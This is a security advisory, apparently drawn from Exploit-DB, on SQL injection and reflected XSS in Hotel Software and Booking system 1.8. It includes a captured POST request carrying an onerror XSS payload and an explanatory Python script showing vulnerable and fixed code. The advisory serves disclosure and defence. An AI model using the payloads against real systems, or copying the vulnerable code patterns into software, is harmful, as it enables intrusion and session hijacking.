Vendor: Hotel Software and Booking system
By: Dylan Irzi
CVSS: 8.8 (HIGH)
CWE: 89, 79 (SQL Injection and Cross Site Scripting)
Product Name: Hotel Software and Booking system
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win8 & Linux Mint
Year: 2013

Hotel Software and Booking system 1.8 – SQL Injection / Cross Site Scripting

Hotel Software and Booking system 1.8 fails to neutralise attacker-controlled input at two points in its /cbadm/ backend. The reservations search, http://localhost/cbadm/reservations/index.php?ac=search, reflects the POSTed search term `s` into the page without HTML encoding (Cross Site Scripting, CWE-79), and http://localhost/cbadm/clients/edit_client.php?id=1 passes the `id` parameter into an SQL query (SQL Injection, CWE-89); for the latter the advisory names only the vulnerable parameter and gives no injection string or database details. The XSS PoC is a POST to http://server/cbadm/reservations/index.php?ac=search with the body s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok. Decoded, the search term is ""><img src=x onerror=prompt(/XSS/);>>: it is built to break out of a quoted attribute and inject an image element whose onerror handler runs when the bogus source fails to load. The captured request carries a PHPSESSID cookie and a Referer of http://demo.cbhotel.eu/cbadm/adm_main.php, so the PoC was issued from a logged-in backend session; because the payload travels in a POST body, delivering it to an administrator requires a page that auto-submits the form from the victim's browser rather than a plain link.

Mitigation:

Pass the `id` parameter of edit_client.php to the database as a bound parameter of a prepared statement and reject any value that is not a plain integer; never concatenate it into the query text. HTML-encode the search term `s` (and any other user-supplied value) at the point where the reservations page writes it into HTML, so that the quotes and angle brackets of the payload are emitted as entities. Input validation on its own closes neither hole; parameterised queries and contextual output encoding are the controls that do. No vendor patch is listed, so until one exists, restricting access to the /cbadm/ backend to trusted administrator networks limits who can reach the vulnerable pages.
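The two sinks described above, modelled as an added example (this is not code from the advisory or from the cbhotel product): a Python script that decodes the PoC body, shows the search term reflected with and without HTML encoding, and runs the `id` lookup against a hypothetical in-memory `clients` table both by string concatenation and as a parameterised query. The table, its column names and the `1 OR 1=1` probe are constructed for illustration; the advisory does not describe the real schema or any SQL payload.

```python
"""Added example, not part of the original advisory or the vendor's code.

Models the two reported bug classes offline: the reflected search term of
/cbadm/reservations/index.php?ac=search and the `id` lookup of
/cbadm/clients/edit_client.php, using a hypothetical SQLite table.
"""
import html
import sqlite3
from urllib.parse import parse_qs

# Exact POST body from the advisory's XSS PoC (Content-Length 87).
POC_BODY = "s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok"


def decode_search_term(body: str) -> str:
    """Return the decoded `s` field of an application/x-www-form-urlencoded body."""
    return parse_qs(body, keep_blank_values=True)["s"][0]


def render_search_vulnerable(term: str) -> str:
    """Echo the term into a quoted attribute with no encoding (the reported behaviour)."""
    return f'<input type="text" name="s" value="{term}">'


def render_search_fixed(term: str) -> str:
    """Same markup with HTML attribute encoding; quotes and brackets become entities."""
    return f'<input type="text" name="s" value="{html.escape(term, quote=True)}">'


def _clients_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the application's client table
    # (assumption: the real schema is not described in the advisory).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO clients VALUES (?, ?)", [(1, "alice"), (2, "bob"), (3, "carol")]
    )
    return conn


def load_client_vulnerable(client_id: str) -> list:
    """String-concatenated query: the `id` value becomes part of the SQL text."""
    with _clients_db() as conn:
        sql = "SELECT id, name FROM clients WHERE id = " + client_id + " ORDER BY id"
        return conn.execute(sql).fetchall()


def load_client_fixed(client_id: str) -> list:
    """Type check plus bound parameter: the value is data, never parsed as SQL."""
    if not client_id.isdigit():
        return []  # reject anything that is not a plain integer id
    with _clients_db() as conn:
        sql = "SELECT id, name FROM clients WHERE id = ? ORDER BY id"
        return conn.execute(sql, (int(client_id),)).fetchall()


if __name__ == "__main__":
    term = decode_search_term(POC_BODY)
    print(term)
    print(render_search_vulnerable(term))   # live <img ... onerror=...> in the page
    print(render_search_fixed(term))        # inert &lt;img ...&gt; text
    print(load_client_vulnerable("1 OR 1=1"))  # every row comes back
    print(load_client_fixed("1 OR 1=1"))       # rejected, nothing returned
```

The vulnerable renderer emits the payload as a real `<img>` element, while `html.escape` turns the leading quotes into `&quot;&quot;` so the attribute is never closed. On the SQL side, `1 OR 1=1` widens the concatenated query to the whole table, whereas the parameterised version refuses the non-numeric value outright and, even for a digit string, binds it as a value rather than query text.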

Exploit-DB raw data:

###########################################################################################
# Exploit Title: Hotel Software and Booking system 1.8 - SQL Injection / Cross Site Scripting
# Date: 21 August 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://www.cbhotel.eu/
# Tested on: Win8 & Linux Mint
# Affected Version : 1.8 & earlier.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev, SeguridadBlanca (Dedalo)
###########################################################################################

*Cross Site Scripting:*
Affected files:

http://localhost/cbadm/reservations/index.php?ac=search
-------------------------------------------------------------------
PoC:
*Cross Site Scripting (POST request).*
URL: http://server/cbadm/reservations/index.php?ac=search

Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 AlexaToolbar/alxf-2.18
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.cbhotel.eu/cbadm/adm_main.php
Cookie: PHPSESSID=flp86mf2huj240qp6hj34ojgp3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
-------------------------------------------------------------------
s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok
-------------------------------------------------------------------
*SQL Injection*

http://localhost/cbadm/clients/edit_client.php?id=1 (SQL Injection)


*By Dylan Irzi
@Dylan_Irzi11
Security pentesting.
WhiteHat.
*